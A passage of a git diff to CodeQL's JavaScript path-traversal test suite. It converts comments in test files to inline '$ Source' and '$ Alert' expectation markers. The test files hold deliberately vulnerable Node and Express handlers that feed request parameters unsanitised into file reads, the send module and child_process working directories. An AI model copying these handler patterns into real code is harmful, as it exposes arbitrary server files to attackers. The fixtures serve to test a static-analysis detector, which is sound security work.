tainted-string-steps.js:10:18:10:31 | path.substr(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:11:18:11:30 | path.slice(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:11:18:11:30 | path.slice(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:15:18:15:46 | unknown ... , path) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:15:18:15:46 | unknown ... , path) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:17:18:17:28 | path.trim() | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:17:18:17:28 | path.trim() | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:27:18:27:36 | path.split(unknown) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:27:18:27:36 | path.split(unknown) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| torrents.js:7:25:7:27 | loc | torrents.js:5:13:5:38 | parseTo ... t).name | torrents.js:7:25:7:27 | loc | This path depends on a $@. | torrents.js:5:13:5:38 | parseTo ... t).name | user-provided value | -| typescript.ts:12:29:12:32 | path | typescript.ts:9:24:9:30 | req.url | typescript.ts:12:29:12:32 | path | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| typescript.ts:21:39:21:43 | path3 | typescript.ts:9:24:9:30 | req.url | typescript.ts:21:39:21:43 | path3 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| typescript.ts:24:39:24:43 | path4 | typescript.ts:9:24:9:30 | req.url | typescript.ts:24:39:24:43 | path4 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| typescript.ts:32:29:32:33 | path6 | typescript.ts:9:24:9:30 | req.url | typescript.ts:32:29:32:33 | path6 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| views.js:1:43:1:55 | req.params[0] | views.js:1:43:1:55 | req.params[0] | views.js:1:43:1:55 | req.params[0] | This path depends on a $@. | views.js:1:43:1:55 | req.params[0] | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js index fd768fecfff8..ba57e930f03f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js @@ -6,65 +6,54 @@ var fs = require('fs'), ; var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source - // BAD: This could read any file on the file system - res.write(fs.readFileSync(path)); + res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system - // BAD: This could still read any file on the file system - res.write(fs.readFileSync("/home/user/" + path)); + res.write(fs.readFileSync("/home/user/" + path)); // $ Alert - This could still read any file on the file system if (path.startsWith("/home/user/")) - res.write(fs.readFileSync(path)); // BAD: Insufficient sanitisation + res.write(fs.readFileSync(path)); // $ Alert - Insufficient sanitisation if (path.indexOf("secret") == -1) - res.write(fs.readFileSync(path)); // BAD: Insufficient sanitisation + res.write(fs.readFileSync(path)); // $ Alert - Insufficient sanitisation if (fs.existsSync(path)) - res.write(fs.readFileSync(path)); // BAD: Insufficient sanitisation + res.write(fs.readFileSync(path)); // $ Alert - Insufficient sanitisation if (path === 'foo.txt') - res.write(fs.readFileSync(path)); // GOOD: Path is compared to white-list + res.write(fs.readFileSync(path)); // OK - Path is compared to white-list if (path === 'foo.txt' || path === 'bar.txt') - res.write(fs.readFileSync(path)); // GOOD: Path is compared to white-list + res.write(fs.readFileSync(path)); // OK - Path is compared to white-list if (path === 'foo.txt' || path === 'bar.txt' || someOpaqueCondition()) - res.write(fs.readFileSync(path)); // BAD: Path is incompletely compared to white-list + res.write(fs.readFileSync(path)); // $ Alert - Path is incompletely compared to white-list path = sanitize(path); - res.write(fs.readFileSync(path)); // GOOD: Path is sanitized + res.write(fs.readFileSync(path)); // OK - Path is sanitized - path = url.parse(req.url, true).query.path; - // GOOD: basename is safe + path = url.parse(req.url, true).query.path; // $ Source + // OK - basename is safe res.write(fs.readFileSync(pathModule.basename(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.dirname(path))); - // GOOD: extname is safe + res.write(fs.readFileSync(pathModule.dirname(path))); // $ Alert - taint is preserved + // OK - extname is safe res.write(fs.readFileSync(pathModule.extname(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.join(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.join(x, y, path, z))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.normalize(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.relative(x, path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.relative(path, x))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.resolve(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.resolve(x, y, path, z))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.toNamespacedPath(path))); + res.write(fs.readFileSync(pathModule.join(path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.join(x, y, path, z))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.normalize(path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.relative(x, path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.relative(path, x))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.resolve(path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.resolve(x, y, path, z))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.toNamespacedPath(path))); // $ Alert - taint is preserved }); var server = http.createServer(function(req, res) { // tests for a few uri-libraries - res.write(fs.readFileSync(require("querystringify").parse(req.url).query)); // NOT OK - res.write(fs.readFileSync(require("query-string").parse(req.url).query)); // NOT OK - res.write(fs.readFileSync(require("querystring").parse(req.url).query)); // NOT OK + res.write(fs.readFileSync(require("querystringify").parse(req.url).query)); // $ Alert + res.write(fs.readFileSync(require("query-string").parse(req.url).query)); // $ Alert + res.write(fs.readFileSync(require("querystring").parse(req.url).query)); // $ Alert }); (function(){ @@ -72,7 +61,7 @@ var server = http.createServer(function(req, res) { var express = require('express'); var application = express(); - var views_local = (req, res) => res.render(req.params[0]); + var views_local = (req, res) => res.render(req.params[0]); // $ Alert application.get('/views/*', views_local); var views_imported = require("./views"); @@ -81,12 +70,12 @@ var server = http.createServer(function(req, res) { })(); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source - res.write(fs.readFileSync(fs.realpathSync(path))); + res.write(fs.readFileSync(fs.realpathSync(path))); // $ Alert fs.realpath(path, function(err, realpath){ - res.write(fs.readFileSync(realpath)); + res.write(fs.readFileSync(realpath)); // $ Alert } ); @@ -100,7 +89,7 @@ var server = http.createServer(function(req, res) { path = path.replace(/\.\./g, ''); // remove all ".." } - res.write(fs.readFileSync(path)); // OK. Is sanitized above. + res.write(fs.readFileSync(path)); // OK - Is sanitized above. }); var server = http.createServer(function(req, res) { @@ -113,70 +102,70 @@ var server = http.createServer(function(req, res) { path = path.replace(/\.\./g, ''); // remove all ".." } - res.write(fs.readFileSync(path)); // OK. Is sanitized above. + res.write(fs.readFileSync(path)); // OK - Is sanitized above. }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source - require('send')(req, path); // NOT OK + require('send')(req, path); // $ Alert }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var split = path.split("/"); - fs.readFileSync(split.join("/")); // NOT OK + fs.readFileSync(split.join("/")); // $ Alert - fs.readFileSync(prefix + split[split.length - 1]) // OK + fs.readFileSync(prefix + split[split.length - 1]) - fs.readFileSync(split[x]) // NOT OK - fs.readFileSync(prefix + split[x]) // NOT OK + fs.readFileSync(split[x]) // $ Alert + fs.readFileSync(prefix + split[x]) // $ Alert var concatted = prefix.concat(split); - fs.readFileSync(concatted.join("/")); // NOT OK + fs.readFileSync(concatted.join("/")); // $ Alert var concatted2 = split.concat(prefix); - fs.readFileSync(concatted2.join("/")); // NOT OK + fs.readFileSync(concatted2.join("/")); // $ Alert - fs.readFileSync(split.pop()); // NOT OK + fs.readFileSync(split.pop()); // $ Alert }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source // Removal of forward-slash or dots. - res.write(fs.readFileSync(path.replace(/[\]\[*,;'"`<>\\?\/]/g, ''))); // OK. - res.write(fs.readFileSync(path.replace(/[abcd]/g, ''))); // NOT OK - res.write(fs.readFileSync(path.replace(/[./]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/[foobar/foobar]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\//g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\.|\//g, ''))); // OK - - res.write(fs.readFileSync(path.replace(/[.]/g, ''))); // NOT OK (can be absolute) - res.write(fs.readFileSync(path.replace(/[..]/g, ''))); // NOT OK (can be absolute) - res.write(fs.readFileSync(path.replace(/\./g, ''))); // NOT OK (can be absolute) - res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); // NOT OK (can be absolute) + res.write(fs.readFileSync(path.replace(/[\]\[*,;'"`<>\\?\/]/g, ''))); + res.write(fs.readFileSync(path.replace(/[abcd]/g, ''))); // $ Alert + res.write(fs.readFileSync(path.replace(/[./]/g, ''))); + res.write(fs.readFileSync(path.replace(/[foobar/foobar]/g, ''))); + res.write(fs.readFileSync(path.replace(/\//g, ''))); + res.write(fs.readFileSync(path.replace(/\.|\//g, ''))); + + res.write(fs.readFileSync(path.replace(/[.]/g, ''))); // $ Alert - can be absolute + res.write(fs.readFileSync(path.replace(/[..]/g, ''))); // $ Alert - can be absolute + res.write(fs.readFileSync(path.replace(/\./g, ''))); // $ Alert - can be absolute + res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); // $ Alert - can be absolute if (!pathModule.isAbsolute(path)) { - res.write(fs.readFileSync(path.replace(/[.]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/[..]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\./g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); // OK + res.write(fs.readFileSync(path.replace(/[.]/g, ''))); + res.write(fs.readFileSync(path.replace(/[..]/g, ''))); + res.write(fs.readFileSync(path.replace(/\./g, ''))); + res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); } // removing of "../" from prefix. - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); // OK - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.[\/\\])+/, ''))); // OK - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)+/, ''))); // OK - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)*/, ''))); // OK + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.[\/\\])+/, ''))); + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)+/, ''))); + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)*/, ''))); - res.write(fs.readFileSync("prefix" + path.replace(/^(\.\.[\/\\])+/, ''))); // NOT OK - not normalized - res.write(fs.readFileSync(pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); // NOT OK (can be absolute) + res.write(fs.readFileSync("prefix" + path.replace(/^(\.\.[\/\\])+/, ''))); // $ Alert - not normalized + res.write(fs.readFileSync(pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); // $ Alert - can be absolute }); import normalizeUrl from 'normalize-url'; @@ -184,38 +173,38 @@ import normalizeUrl from 'normalize-url'; var server = http.createServer(function(req, res) { // tests for a few more uri-libraries const qs = require("qs"); - res.write(fs.readFileSync(qs.parse(req.url).foo)); // NOT OK - res.write(fs.readFileSync(qs.parse(normalizeUrl(req.url)).foo)); // NOT OK + res.write(fs.readFileSync(qs.parse(req.url).foo)); // $ Alert + res.write(fs.readFileSync(qs.parse(normalizeUrl(req.url)).foo)); // $ Alert const parseqs = require("parseqs"); - res.write(fs.readFileSync(parseqs.decode(req.url).foo)); // NOT OK + res.write(fs.readFileSync(parseqs.decode(req.url).foo)); // $ Alert }); const cp = require("child_process"); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; - cp.execSync("foobar", {cwd: path}); // NOT OK - cp.execFileSync("foobar", ["args"], {cwd: path}); // NOT OK - cp.execFileSync("foobar", {cwd: path}); // NOT OK + let path = url.parse(req.url, true).query.path; // $ Source + cp.execSync("foobar", {cwd: path}); // $ Alert + cp.execFileSync("foobar", ["args"], {cwd: path}); // $ Alert + cp.execFileSync("foobar", {cwd: path}); // $ Alert }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source // Removal of forward-slash or dots. - res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", 'g'), ''))); // OK - res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", ''), ''))); // NOT OK. - res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", unknownFlags()), ''))); // OK -- Might be okay depending on what unknownFlags evaluates to. + res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", 'g'), ''))); + res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", ''), ''))); // $ Alert + res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", unknownFlags()), ''))); // OK - Might be okay depending on what unknownFlags evaluates to. }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source - res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // NOT OK (can be absolute) + res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // $ Alert - can be absolute if (!pathModule.isAbsolute(path)) { - res.write(fs.readFileSync(path.replace(new RegExp("[.]", ''), ''))); // NOT OK - res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // OK - res.write(fs.readFileSync(path.replace(new RegExp("[.]", unknownFlags()), ''))); // OK + res.write(fs.readFileSync(path.replace(new RegExp("[.]", ''), ''))); // $ Alert + res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); + res.write(fs.readFileSync(path.replace(new RegExp("[.]", unknownFlags()), ''))); } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.qlref b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.qlref index 53d53cb8dc54..ff3d54b0cd56 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.qlref @@ -1 +1,2 @@ -Security/CWE-022/TaintedPath.ql +query: Security/CWE-022/TaintedPath.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js index 1fdbef68c47e..568269866f5f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js @@ -5,8 +5,7 @@ const fs = require('fs'), const ROOT = "/var/www/"; var server = http.createServer(function(req, res) { - let filePath = url.parse(req.url, true).query.path; + let filePath = url.parse(req.url, true).query.path; // $ Source - // BAD: This function uses unsanitized input that can read any file on the file system. - res.write(fs.readFileSync(ROOT + filePath, 'utf8')); + res.write(fs.readFileSync(ROOT + filePath, 'utf8')); // $ Alert - This function uses unsanitized input that can read any file on the file system. }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js index ac8dd4fb9ba8..5b497cfddccb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js @@ -8,7 +8,7 @@ const ROOT = "/var/www/"; var server = http.createServer(function(req, res) { let filePath = url.parse(req.url, true).query.path; - // GOOD: Verify that the file path is under the root directory + // OK - Verify that the file path is under the root directory filePath = fs.realpathSync(path.resolve(ROOT, filePath)); if (!filePath.startsWith(ROOT)) { res.statusCode = 403; diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/express.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/express.js index dad320e3abae..13c6ad082abe 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/express.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/express.js @@ -5,5 +5,5 @@ let app = express(); app.use(fileUpload()); app.get("/some/path", function (req, res) { - req.files.foo.mv(req.query.bar); + req.files.foo.mv(req.query.bar); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js index 512b851592aa..ffbeb5a767ba 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js @@ -8,11 +8,11 @@ const data = {}; function init() { hb.registerHelper("catFile", function catFile(filePath) { - return fs.readFileSync(filePath); // SINK (reads file) + return fs.readFileSync(filePath); // $ Alert }); hb.registerHelper("prependToLines", function prependToLines(prefix, filePath) { return fs - .readFileSync(filePath) + .readFileSync(filePath) // $ Alert .split("\n") .map((line) => prefix + line) .join("\n"); @@ -26,27 +26,27 @@ function init() { init(); app.get('/some/path1', function (req, res) { - res.send(data.compiledFileAccess({ path: req.params.path })); // NOT ALLOWED (template uses vulnerable catFile) + res.send(data.compiledFileAccess({ path: req.params.path })); // $ Source - template uses vulnerable catFile }); app.get('/some/path2', function (req, res) { - res.send(data.compiledBenign({ name: req.params.name })); // ALLOWED (this template does not use catFile) + res.send(data.compiledBenign({ name: req.params.name })); // OK - this template does not use catFile }); app.get('/some/path3', function (req, res) { - res.send(data.compiledUnknown({ name: req.params.name })); // ALLOWED (could be using a vulnerable helper, but we'll assume it's ok) + res.send(data.compiledUnknown({ name: req.params.name })); // OK - could be using a vulnerable helper, but we'll assume it's ok }); app.get('/some/path4', function (req, res) { res.send(data.compiledMixed({ prefix: ">>> ", - path: req.params.path // NOT ALLOWED (template uses vulnerable helper) + path: req.params.path // $ Source - template uses vulnerable helper })); }); app.get('/some/path5', function (req, res) { res.send(data.compiledMixed({ - prefix: req.params.prefix, // ALLOWED (this parameter is safe) + prefix: req.params.prefix, // OK - this parameter is safe path: "data/path-5.txt" })); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js index 4fa6b3f50d54..4365de77a40f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js @@ -8,98 +8,98 @@ var fs = require('fs'), let app = express(); app.get('/basic', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source - fs.readFileSync(path); // NOT OK - fs.readFileSync('./' + path); // NOT OK - fs.readFileSync(path + '/index.html'); // NOT OK - fs.readFileSync(pathModule.join(path, 'index.html')); // NOT OK - fs.readFileSync(pathModule.join('/home/user/www', path)); // NOT OK + fs.readFileSync(path); // $ Alert + fs.readFileSync('./' + path); // $ Alert + fs.readFileSync(path + '/index.html'); // $ Alert + fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert + fs.readFileSync(pathModule.join('/home/user/www', path)); // $ Alert }); app.get('/normalize', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source - fs.readFileSync(path); // NOT OK - fs.readFileSync('./' + path); // NOT OK - fs.readFileSync(path + '/index.html'); // NOT OK - fs.readFileSync(pathModule.join(path, 'index.html')); // NOT OK - fs.readFileSync(pathModule.join('/home/user/www', path)); // NOT OK + fs.readFileSync(path); // $ Alert + fs.readFileSync('./' + path); // $ Alert + fs.readFileSync(path + '/index.html'); // $ Alert + fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert + fs.readFileSync(pathModule.join('/home/user/www', path)); // $ Alert }); app.get('/normalize-notAbsolute', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (pathModule.isAbsolute(path)) return; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.startsWith(".")) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK - wrong polarity + fs.readFileSync(path); // $ Alert - wrong polarity if (!path.startsWith("..")) - fs.readFileSync(path); // OK + fs.readFileSync(path); if (!path.startsWith("../")) - fs.readFileSync(path); // OK + fs.readFileSync(path); if (!path.startsWith(".." + pathModule.sep)) - fs.readFileSync(path); // OK + fs.readFileSync(path); }); app.get('/normalize-noInitialDotDot', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (path.startsWith("..")) return; - fs.readFileSync(path); // NOT OK - could be absolute + fs.readFileSync(path); // $ Alert - could be absolute fs.readFileSync("./" + path); // OK - coerced to relative - fs.readFileSync(path + "/index.html"); // NOT OK - not coerced + fs.readFileSync(path + "/index.html"); // $ Alert - not coerced if (!pathModule.isAbsolute(path)) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/prepend-normalize', (req, res) => { // Coerce to relative prior to normalization - let path = pathModule.normalize('./' + req.query.path); + let path = pathModule.normalize('./' + req.query.path); // $ Source if (!path.startsWith("..")) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/absolute', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source if (!pathModule.isAbsolute(path)) return; - res.write(fs.readFileSync(path)); // NOT OK + res.write(fs.readFileSync(path)); // $ Alert if (path.startsWith('/home/user/www')) - res.write(fs.readFileSync(path)); // NOT OK - can still contain '../' + res.write(fs.readFileSync(path)); // $ Alert - can still contain '../' }); app.get('/normalized-absolute', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (!pathModule.isAbsolute(path)) return; - res.write(fs.readFileSync(path)); // NOT OK + res.write(fs.readFileSync(path)); // $ Alert if (path.startsWith('/home/user/www')) - res.write(fs.readFileSync(path)); // OK + res.write(fs.readFileSync(path)); }); app.get('/combined-check', (req, res) => { @@ -107,71 +107,71 @@ app.get('/combined-check', (req, res) => { // Combined absoluteness and folder check in one startsWith call if (path.startsWith("/home/user/www")) - fs.readFileSync(path); // OK + fs.readFileSync(path); if (path[0] !== "/" && path[0] !== ".") - fs.readFileSync(path); // OK + fs.readFileSync(path); }); app.get('/realpath', (req, res) => { - let path = fs.realpathSync(req.query.path); + let path = fs.realpathSync(req.query.path); // $ Source - fs.readFileSync(path); // NOT OK - fs.readFileSync(pathModule.join(path, 'index.html')); // NOT OK + fs.readFileSync(path); // $ Alert + fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert if (path.startsWith("/home/user/www")) fs.readFileSync(path); // OK - both absolute and normalized before check fs.readFileSync(pathModule.join('.', path)); // OK - normalized and coerced to relative - fs.readFileSync(pathModule.join('/home/user/www', path)); // OK + fs.readFileSync(pathModule.join('/home/user/www', path)); }); app.get('/coerce-relative', (req, res) => { - let path = pathModule.join('.', req.query.path); + let path = pathModule.join('.', req.query.path); // $ Source if (!path.startsWith('..')) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/coerce-absolute', (req, res) => { - let path = pathModule.join('/home/user/www', req.query.path); + let path = pathModule.join('/home/user/www', req.query.path); // $ Source if (path.startsWith('/home/user/www')) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/concat-after-normalization', (req, res) => { - let path = 'foo/' + pathModule.normalize(req.query.path); + let path = 'foo/' + pathModule.normalize(req.query.path); // $ Source if (!path.startsWith('..')) - fs.readFileSync(path); // NOT OK - prefixing foo/ invalidates check + fs.readFileSync(path); // $ Alert - prefixing foo/ invalidates check else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.includes('..')) - fs.readFileSync(path); // OK + fs.readFileSync(path); }); app.get('/noDotDot', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (path.includes('..')) return; - fs.readFileSync(path); // NOT OK - can still be absolute + fs.readFileSync(path); // $ Alert - can still be absolute if (!pathModule.isAbsolute(path)) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/join-regression', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source // Regression test for a specific corner case: // Some guard nodes sanitize both branches, but for a different set of flow labels. @@ -181,191 +181,191 @@ app.get('/join-regression', (req, res) => { if (path.startsWith('/x')) {path;} else {path;} if (path.startsWith('.')) {path;} else {path;} - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (pathModule.isAbsolute(path)) - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (path.includes('..')) - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.includes('..') && !pathModule.isAbsolute(path)) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert let normalizedPath = pathModule.normalize(path); if (normalizedPath.startsWith('/home/user/www')) - fs.readFileSync(normalizedPath); // OK + fs.readFileSync(normalizedPath); else - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert if (normalizedPath.startsWith('/home/user/www') || normalizedPath.startsWith('/home/user/public')) - fs.readFileSync(normalizedPath); // OK - but flagged anyway [INCONSISTENCY] + fs.readFileSync(normalizedPath); // $ SPURIOUS: Alert else - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert }); app.get('/decode-after-normalization', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (!pathModule.isAbsolute(path) && !path.startsWith('..')) - fs.readFileSync(path); // OK + fs.readFileSync(path); path = decodeURIComponent(path); if (!pathModule.isAbsolute(path) && !path.startsWith('..')) - 